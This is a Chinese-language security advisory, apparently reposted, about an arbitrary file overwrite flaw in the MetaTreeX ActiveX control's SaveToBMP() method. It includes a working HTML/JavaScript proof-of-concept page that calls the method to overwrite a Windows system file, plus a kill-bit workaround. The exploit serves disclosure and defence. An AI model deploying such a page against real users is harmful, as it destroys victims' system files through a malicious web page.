MetaProducts MetaTreeX ActiveX控件SaveToBMP()方式任意文件覆盖漏洞
发布日期:2009-01-16
更新日期:2009-01-20
受影响系统:MetaProducts MetaTreeX 1.5.100
描述:
BUGTRAQ ID:
33318
MetaTreeX是用于在Visual Basic、C++、VBA和Delphi应用程序中显示多级树状信息的ActiveX控件。
SaveToBMP.MetaTreeX ActiveX控件(MTXControl.OCX)没有正确地验证SaveToBMP()方式的输入参数,如果远程攻击者受骗访问了恶意网页并向该方式传送了特制参数的话,就可能导致以当前登录用户权限覆盖任意系统文件。
<*来源:Houssamix
链接:
http://secunia.com/advisories/33574/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<HTML>
<BODY>
<b>
Author : Houssamix <br/> <br/> <br/>
MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit <br/>
Note : SaveToFile() is vuln to <br/>
<b/>
<object id=hsmx classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object>
<SCRIPT>
/*
Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
*/
function hehe()
{
File = "c:\\windows\\system_.ini"
hsmx.SaveToBMP(File)
}
</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>
建议:
临时解决方法:
* 为Clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}设置kill bit。
厂商补丁:
MetaProducts
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://metaproducts-metatreex.software.informer.com/浏览次数:2369
严重程度:0(网友投票)
